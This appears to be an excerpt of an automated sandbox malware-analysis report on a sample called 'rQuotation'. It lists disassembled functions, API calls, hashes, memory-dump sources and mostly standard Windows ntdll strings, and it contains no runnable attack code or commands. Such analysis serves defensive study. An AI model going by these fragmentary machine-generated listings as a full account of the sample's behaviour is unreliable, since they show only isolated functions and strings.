                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: b24cf5557b4f9675c1e456c300a1504aea191f31fd828e8cf7209fc0f651cbf3
                                                                                                                                                                                                                                                • Instruction ID: af0a471421fd5d0bbd051aa01647370466ed494a06c84b70e93fc7d6d6879cf0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b24cf5557b4f9675c1e456c300a1504aea191f31fd828e8cf7209fc0f651cbf3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70E06D72604309BBD610EE5CDC41FAB37ACEFC9710F004419F908A7241CA70B9118AB5
                                                                                                                                                                                                                                                Function 0086D053 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 113 86d053-86d08c call 844623 call 86def3 ExitProcess
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,D43193C6,?,?,D43193C6), ref: 0086D087
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                • Opcode ID: 60c8520bca689abc692f2d56e9f6b485b0ffbb8f78683b2f57a47bea02d742e5
                                                                                                                                                                                                                                                • Instruction ID: ceaf1ad652592fcfbf462136131ab596407f55bf238b074ce1b7b8bc33624c15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60c8520bca689abc692f2d56e9f6b485b0ffbb8f78683b2f57a47bea02d742e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E046363002587BD220BA6DDC41F9B776CFBCA724F014419FA08AB242D6B1BA0086A2
                                                                                                                                                                                                                                                Function 00857D88 Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 118 857d88-857d91 119 857d93-857d98 118->119 120 857d22-857d27 LdrLoadDll 118->120 121 857d2a-857d2d 120->121
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 30a2c10e8c3c889923439468e507f728740e7998c8fd295b7ec1871b54246c68
                                                                                                                                                                                                                                                • Instruction ID: 11cf799af3adf79fa320ddd98a68344f7233b24111f49f5bb41352ef8194fc84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a2c10e8c3c889923439468e507f728740e7998c8fd295b7ec1871b54246c68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC01218E2C288DA8F6786F81451229FF25AD9616270C87CAAC4886A45D63ACA568742
                                                                                                                                                                                                                                                Function 01702C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 122 1702c0a-1702c0f 123 1702c11-1702c18 122->123 124 1702c1f-1702c26 LdrInitializeThunk 122->124
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 6eb89dcf897c22b7cd4b6cb7a7127af612bcb8998379ad6e66150812ca2be422
                                                                                                                                                                                                                                                • Instruction ID: dfc15c05df4d4070d86287a06ab2f98d55d2f4987570a5b24f5a7e673a8a476c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eb89dcf897c22b7cd4b6cb7a7127af612bcb8998379ad6e66150812ca2be422
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45B09B739455C5C6DB12E764460C717B94077D1701F15C075D2030695F8738C1D1E276

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 01742349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                                                                                • Opcode ID: 6bb19adf42068599eda347e22a22847a749ec4337790252f9d615747b614a222
                                                                                                                                                                                                                                                • Instruction ID: c8abcdb896b6ce164262ac25a27afaf3abc7d240793a13d8458e7800550013d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bb19adf42068599eda347e22a22847a749ec4337790252f9d615747b614a222
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E92AC71608342ABE721DF28C884B6BFBE9BB84754F04492DFA94D7252D770E844CB92
                                                                                                                                                                                                                                                Function 016B68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-3089669407
                                                                                                                                                                                                                                                • Opcode ID: 5a5fdc806523391d5e112860d02746453bc571ded63596a88962ca3a4f98dfaf
                                                                                                                                                                                                                                                • Instruction ID: 54ed08e7deb05ad4757c0e61eb84ee0e3c910bd7293dd30cc675bbba9f0ea79c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5fdc806523391d5e112860d02746453bc571ded63596a88962ca3a4f98dfaf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D08120B2D01219AF9B22EAE8DDD4FEFB7BEAB046147444526FA01F7114E730DD458BA0
                                                                                                                                                                                                                                                Function 01765910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • @, xrefs: 01766277
                                                                                                                                                                                                                                                • PreferredUILanguages, xrefs: 017663D1
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01765FE1
                                                                                                                                                                                                                                                • @, xrefs: 01766027
                                                                                                                                                                                                                                                • InstallLanguageFallback, xrefs: 01766050
                                                                                                                                                                                                                                                • @, xrefs: 017661B0
                                                                                                                                                                                                                                                • Control Panel\Desktop, xrefs: 0176615E
                                                                                                                                                                                                                                                • LanguageConfiguration, xrefs: 01766420
                                                                                                                                                                                                                                                • @, xrefs: 017663A0
                                                                                                                                                                                                                                                • LanguageConfigurationPending, xrefs: 01766221
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0176635D
                                                                                                                                                                                                                                                • PreferredUILanguagesPending, xrefs: 017661D2
                                                                                                                                                                                                                                                • @, xrefs: 0176647A
                                                                                                                                                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01765A84
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                                                                                                                • API String ID: 0-1325123933
                                                                                                                                                                                                                                                • Opcode ID: 0bac40719f85b4f06a908124193c8483a7fde636391cfcd834d8dc6d1fb54311
                                                                                                                                                                                                                                                • Instruction ID: d81bb929272e647a0510cbc08e19b75a3e776e510f12120f30295a2419fe6b59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bac40719f85b4f06a908124193c8483a7fde636391cfcd834d8dc6d1fb54311
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 557268B15083419FD725DF28C884BABFBE9BB88744F84492DFA85D7250EB30D905DB92
                                                                                                                                                                                                                                                Function 016F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • corrupted critical section, xrefs: 017354C2
                                                                                                                                                                                                                                                • Critical section address, xrefs: 01735425, 017354BC, 01735534
                                                                                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 017354AE, 017354FA
                                                                                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017354E2
                                                                                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01735543
                                                                                                                                                                                                                                                • Critical section address., xrefs: 01735502
                                                                                                                                                                                                                                                • Thread identifier, xrefs: 0173553A
                                                                                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017354CE
                                                                                                                                                                                                                                                • 8, xrefs: 017352E3
                                                                                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0173540A, 01735496, 01735519
                                                                                                                                                                                                                                                • Critical section debug info address, xrefs: 0173541F, 0173552E
                                                                                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0173542B
                                                                                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01735508
                                                                                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017354B6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                                                                                • Opcode ID: a99b546ca861c7bc25274b7707781193f7a27f61a1dd9a1a21d6b4451cb9cce2
                                                                                                                                                                                                                                                • Instruction ID: 9918d57cb90ae30e4a3b948576356df8287cdcd6edc7b5ec75812b517826af01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a99b546ca861c7bc25274b7707781193f7a27f61a1dd9a1a21d6b4451cb9cce2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C819AB1A41358AFDB20CF99CC44BAEFBB9FB48714F604159F605B7281D375A940CBA0
                                                                                                                                                                                                                                                Function 016F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01732602
                                                                                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01732624
                                                                                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01732498
                                                                                                                                                                                                                                                • @, xrefs: 0173259B
                                                                                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017325EB
                                                                                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01732412
                                                                                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01732409
                                                                                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0173261F
                                                                                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017324C0
                                                                                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017322E4
                                                                                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01732506
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                                                                                                                                • Opcode ID: d5b30b87c79180d8a127637dfc84c77c107240920f0248a09e5ff14555e93b1c
                                                                                                                                                                                                                                                • Instruction ID: 5d70077b90767719efa0c80b8a3e2f8c23bec4966aa4b044c4111481990d8346
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5b30b87c79180d8a127637dfc84c77c107240920f0248a09e5ff14555e93b1c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06027EB1D002299BDB61DB54CC90B9AF7B8AF54304F4041DEE749A7242EB31AF85CF59
                                                                                                                                                                                                                                                Function 016F0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                                                                                                • API String ID: 0-360209818
                                                                                                                                                                                                                                                • Opcode ID: e90f31aaa6df7056ac36eb6d48e7f1cedef01b24c6ef4d8834c53454ad01ada5
                                                                                                                                                                                                                                                • Instruction ID: 52c897ae6d7ed3d30fd50314f94a8749afd76d7f6d0059d731733eedd33dc8d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e90f31aaa6df7056ac36eb6d48e7f1cedef01b24c6ef4d8834c53454ad01ada5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE6280B5A00229CFDB24CF18CC417A9FBB6AFD5320F9481DAD549AB241DB325AE1CF50
                                                                                                                                                                                                                                                Function 01768B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                                                                                • Opcode ID: 96316ad42bb5ec3f067a2a98192b2129f3176e655b61c7d7cc5ff83c01fd9ed0
                                                                                                                                                                                                                                                • Instruction ID: 8457cafb152a21333fcc56fe42b13290f4a46fd6eab233649d6b32712dcd2048
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96316ad42bb5ec3f067a2a98192b2129f3176e655b61c7d7cc5ff83c01fd9ed0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A51E0711143019BC72ADF288844BABFBECEF98250F14492DED99C7284E770D544CBA3
                                                                                                                                                                                                                                                Function 017712ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                                                                                • API String ID: 0-3591852110
                                                                                                                                                                                                                                                • Opcode ID: 72a38b5c181d1e7ff257f25c9d1c1073e30a59a649d7a585e6206235a41bf868
                                                                                                                                                                                                                                                • Instruction ID: de0742a3385eaacad369e7928d5167300690438b87d7444c80b5d54f91697749
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72a38b5c181d1e7ff257f25c9d1c1073e30a59a649d7a585e6206235a41bf868
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34128D30600642DFEB259F29C485BBAFBF6FF09714F58849DE4868B642D774E880CB90
                                                                                                                                                                                                                                                Function 016DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                • API String ID: 0-3197712848
                                                                                                                                                                                                                                                • Opcode ID: 4ca4d1ac3772cba2280f174b9191d6c6f66186883ae09701c402a6ee2a405ff3
                                                                                                                                                                                                                                                • Instruction ID: a979bf34451be7169588a8125bffbc6427c19cf73cddc860043fb17f25e5eebd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ca4d1ac3772cba2280f174b9191d6c6f66186883ae09701c402a6ee2a405ff3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82121271A083528BD320DF68CC80BAAB7E5FF85714F084A5DF9858B391E734D945CB92
                                                                                                                                                                                                                                                Function 016BD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                • API String ID: 0-3532704233
                                                                                                                                                                                                                                                • Opcode ID: 028724dd3388fbb6b3cf58c5aa5a0279714e6681bc99b2726d699190f7a0f357
                                                                                                                                                                                                                                                • Instruction ID: 0bde89c87dbeefa60855629db773981d886d0083839af5608848ca97e17a2931
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 028724dd3388fbb6b3cf58c5aa5a0279714e6681bc99b2726d699190f7a0f357
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B1C0725093519FC712DF58C880A9FBBE8BF88758F01092EF989DB244D734D985CB92
                                                                                                                                                                                                                                                Function 01770CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                                                                                                • API String ID: 0-1357697941
                                                                                                                                                                                                                                                • Opcode ID: 28c8b3c463f7e0aff1550ec9b54448ee32eed1321bb5943fb6aa7727521f977b
                                                                                                                                                                                                                                                • Instruction ID: dad9e4e3da35299413a27d98c10aac2f6cb74932be178f2313f22ea75080ce04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28c8b3c463f7e0aff1550ec9b54448ee32eed1321bb5943fb6aa7727521f977b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF1F331600646EFDF26DF69C480BAAFBF5FF0A714F48849DE5829B242C770A985CB50
                                                                                                                                                                                                                                                Function 01770274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                                                                                • Opcode ID: e90cd1d0c496c880ba192adf696201b65a1b5eccca17b0229b5778ee64bdd82d
                                                                                                                                                                                                                                                • Instruction ID: 5cb0a8fea405e7bbe15157f2ba5d34d4ffa821c1c040c63f4821f5d1859a647e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e90cd1d0c496c880ba192adf696201b65a1b5eccca17b0229b5778ee64bdd82d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1D1BC31600686DFDF22DF69C890AA9FBF2FF4B714F188099F5469B252C734A981CB14
                                                                                                                                                                                                                                                Function 017489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 01748C50
